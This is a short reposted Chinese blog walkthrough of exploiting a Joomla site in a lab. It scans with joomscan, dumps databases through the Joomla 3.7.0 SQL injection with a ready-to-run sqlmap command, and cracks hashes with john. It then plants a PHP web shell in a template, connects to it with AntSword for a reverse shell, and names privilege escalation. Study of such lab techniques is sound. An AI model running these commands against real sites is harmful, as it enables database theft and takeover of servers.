Joomla漏洞利用

其他 2021-03-03 23:10:03 阅读次数: 0

这里写目录标题

漏洞扫描

joomscan -u http://192.168.1.24/

Joomla3.7.0有一个sql注入漏洞

//--dbs 可变参数部分,通过更改这个参数来获取数据库,表,用户密码
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Join hash文件

john 文件

登陆Joomla管理控制台以后的利用

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

http://192.168.1.24/templates/beez3/html/yjh.php就是文件地址

蚁剑链接,反弹shell

提权

猜你喜欢

转载自blog.csdn.net/qq_44635376/article/details/113521873
今日推荐
周排行
win7之session理解
如何快速上手 AB Testing ?阿里技术专家秘方公开
数据库自助查询平台
【CCF 2017-12-2】游戏问题
Fire!(BFS)
修复GRUB引导故障
老倪祖膏药分销系统
MySQL慢查询日志-捕获慢SQL
批归一化(Batch Normalization)
ssm整合问题-------一
每日归档
更多
2025-03-02(0)
2025-03-01(0)
2025-02-28(0)
2025-02-27(0)
2025-02-26(0)
2025-02-25(0)
2025-02-24(0)
2025-02-23(0)
2025-02-22(0)
2025-02-21(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022